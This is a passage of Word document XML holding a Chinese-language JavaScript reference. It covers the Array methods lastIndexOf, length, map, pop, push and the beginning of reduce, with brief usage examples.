        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>开始查找的可选数组序号。如果省略，则从最后一个元素开始查找。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个小于等于</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>的最大序号值，该序号值处的</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>元素与</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>全等。如果不存在匹配元素时，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</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该方法</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中一个接一个地反向查找等于</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，并返回找到的第一个元素的序号。查找的起始位置是</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>指定的数组序号，如果没有指定，则从最后一个元素开始。判断是否相等使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符。返回值是找到的第一个匹配元素的序号，如果没找到匹配的，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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Array.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="585" w:name="Array_length"/>
      <w:r>
        <w:t>Array.length</w:t>
      </w:r>
      <w:bookmarkEnd w:id="585"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性总是比该数组中定义的序号最大的元素的序号大一。一般来说，数组都是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>稠密</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>数组，拥有连续的元素，并</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>且序号从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始。对于这种数组，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示数组中的元素个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建数组时，会初始化该数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性。把新元素添加到数组中，在有必要时，会更新</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=new Array();//a.length</w:t>
      </w:r>
      <w:r>
        <w:t>初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b=new Array(10);//b.length</w:t>
      </w:r>
      <w:r>
        <w:t>初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c=new Array("one","two","three")</w:t>
      </w:r>
      <w:r>
        <w:t>;//c.length</w:t>
      </w:r>
      <w:r>
        <w:t>初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c[3]="four";//c.length</w:t>
      </w:r>
      <w:r>
        <w:t>更新为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c[10]="blastoff";//c.length</w:t>
      </w:r>
      <w:r>
        <w:t>变成</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以设置</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值来改变数组的大小。如果设置的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>小于原值，会裁减数组，末尾处的元素会丢失。如果设置的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>大于原值，数组会变大，新添加到末尾处的元素的值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="586" w:name="Array_map__"/>
      <w:r>
        <w:t>Array.map()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="586"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从数组元素中计算新值</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array.map(f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.map(f,o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的每一个元素调用的函数。它的返回值会成为返回数组的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>调用时的可选</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新数组，由函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>计算出的元素组成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>会创建一个新数组，数组长度与</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>一样，数组元素通过将</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的元素传递给函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>计算得到。</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>按照从小到大的顺序遍历</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的序号，并为每一个元素调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>一次。对于序号</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>，调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时带有三个参数，</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值则存储在新创建数组的序号</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>处：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>a[i]=f(array[i],i,array)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中的每一个元素都传递给</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，并将其返回值存储在新数组中后，就会返回该新数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</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[1,2,3].map(function(x){return x*x;});//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>[1,4,9]</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Array.every()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.f ilter()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.reduce()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="587" w:name="Array_pop__"/>
      <w:r>
        <w:t>Array.pop()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="587"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除并返回数组的最后一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.pop()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的最后一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>会移除</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的最后一个元素，缩短数组的长度，并返回所移除元素的值。如果数组已经为空，</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>不会修改该数组，返回值是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>与伴随的</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可以提供先进后出（</w:t>
      </w:r>
      <w:r>
        <w:t>FILO</w:t>
      </w:r>
      <w:r>
        <w:t>）的栈功能。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var stack=[];//stack:[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.push(1,2);//stack:[1,2]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.pop();//stack:[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.push([4,5]);//stack:[1,[4,5]]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.pop();//stack:[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>[4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>stack.pop();//stack:[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　返回</w:t>
      </w:r>
      <w:r>
        <w:t>1</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Array.push()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="588" w:name="Array_push__"/>
      <w:r>
        <w:t>Array.push()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="588"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给数组追加元素</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array.push(value,...)</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t>追加到</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>尾部的一个或多个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>把指定值追加到数组后数组的新长度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>会将参数按顺序追加到</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>尾部。它会直接修改</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>，而不会创新一个新数组。</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>与伴随的</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可以提供先进后出（</w:t>
      </w:r>
      <w:r>
        <w:t>FILO</w:t>
      </w:r>
      <w:r>
        <w:t>）的栈功能。例子请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Array.pop()</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Array.pop()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="589" w:name="Array_reduce__"/>
      <w:r>
        <w:t>Array.reduce()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="589"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>从数组元素中计算出一个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.reduce(f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.reduce(f,inital)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个函数，可以合并两个值（比如两个数组元素），并返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>缩减</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的新值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用来缩减数组的可选初始值。如果指定该参数，</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为会像是把该参数插入</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的头部一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组的化简值，该值是最后一次调用</w:t>
